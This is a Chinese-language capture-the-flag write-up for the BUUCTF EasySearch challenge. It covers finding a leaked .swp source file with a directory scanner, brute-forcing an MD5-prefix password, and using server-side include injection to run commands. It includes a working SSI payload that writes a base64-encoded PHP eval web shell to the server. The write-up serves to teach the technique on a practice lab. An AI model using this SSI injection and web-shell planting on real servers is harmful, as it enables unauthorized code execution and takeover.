BUUCTF [BJDCTF2020]EasySearch1
写一篇文章来学习一下 ssi 注入 以及 dirmap 工具的使用
看到这两个框框没什么想法,边探索边扫下目录吧。显示前端报错,先禁用了js,然后又尝试抓了下包,没有发现什么,只好看看扫出来的目录了,最终扫出来了的:
index.php.swp (用dirmap扫出来的)
成功得到源码:
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
虽然两个都显示username,但只有第一个才是真正的$_POST[username]
看一下代码逻辑:
1.首先判断输入的password 的前6位是否为6d0bc1
2.如果满足的话就执行打开文件、写入文件、关闭文件的功能
但是我想着,最终是要读flag的,但这里的东西即使绕过了貌似也是读不到的(一开始我是这样想的,但后面接触了ssi注入,就想到在text这块会有注入)
先来绕过
一、脚本爆破password
from hashlib import md5
test='6d0bc1'
for i in range(100000000):
if md5(str(i).encode('utf-8')).hexdigest()[:6]==test:
print(i)
可以得到 password:2020666
username不为空就行
最终在包中找到:
访问该路径,可以看到:
这里的123就是注入点了
二、ssi注入
ssi注入:服务器包含注入。ssi可以赋予html静态页面的动态效果,通过ssi可以执行相应的命令。
ssi注入的格式为:
<!--#exec cmd="命令"-->
返回index.php尝试注入
成功访问到:
但这样一条条命令执行有些麻烦,尝试写入一句话木马
<?php @eval($_POST['cmd']);?>但直接传入是不行的,需要进行base64加密,所以payload就变成了
username=<!--#exec cmd="echo PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4=|base64 -d> shell.php"-->&password=2020666
回到index.php,先抓包,得到public下的路径,访问phtml执行代码,然后再试试public下的shell.php是否存在
此时已成功执行代码,访问shell.php
发现没报错,getshell
最终找到了flag
flag{4ea3197e-d677-4436-a0db-d53adaa9c131}